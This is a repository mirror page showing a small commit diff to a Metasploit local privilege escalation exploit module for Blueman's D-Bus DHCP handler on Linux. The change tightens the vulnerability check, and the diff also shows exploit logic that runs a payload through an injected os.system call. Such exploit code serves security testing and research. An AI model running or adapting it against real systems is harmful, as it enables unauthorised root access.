infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update check method to confirm vulnerability

GSoC/Meterpreter_Web_Console
bcoles 2019-01-15 11:31:31 +11:00 committed by GitHub
parent 4dc3562046
commit 8c636f27d5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 13 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
modules/exploits/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.rb
View File

@ -105,7 +105,13 @@ class MetasploitModule < Msf::Exploit::Local
end
vprint_good 'org.blueman.Mechanism.EnableNetwork D-Bus interface is available'
CheckCode::Detected
res = execute_python('')
unless res.include? 'eval("nc.set_dhcp_handler(%s)" % dhcp_handler)'
vprint_error 'Target is not vulnerable'
return CheckCode::Safe
end
CheckCode::Vulnerable
end
def execute_python(code)
@ -119,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Local
end
def exploit
unless check == CheckCode::Detected
unless check == CheckCode::Vulnerable
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
@ -144,7 +150,11 @@ class MetasploitModule < Msf::Exploit::Local
res = execute_python "os.system(\"#{payload_path}&\")"
vprint_line res
if res.include? 'SyntaxError: invalid syntax'
unless res.include? 'eval("nc.set_dhcp_handler(%s)" % dhcp_handler)'
fail_with Failure::NotVulnerable, 'The target is not vulnerable'
end
if res.include? 'SyntaxError:'
fail_with Failure::Unknown, 'Payload execution failed due to syntax error'
end
end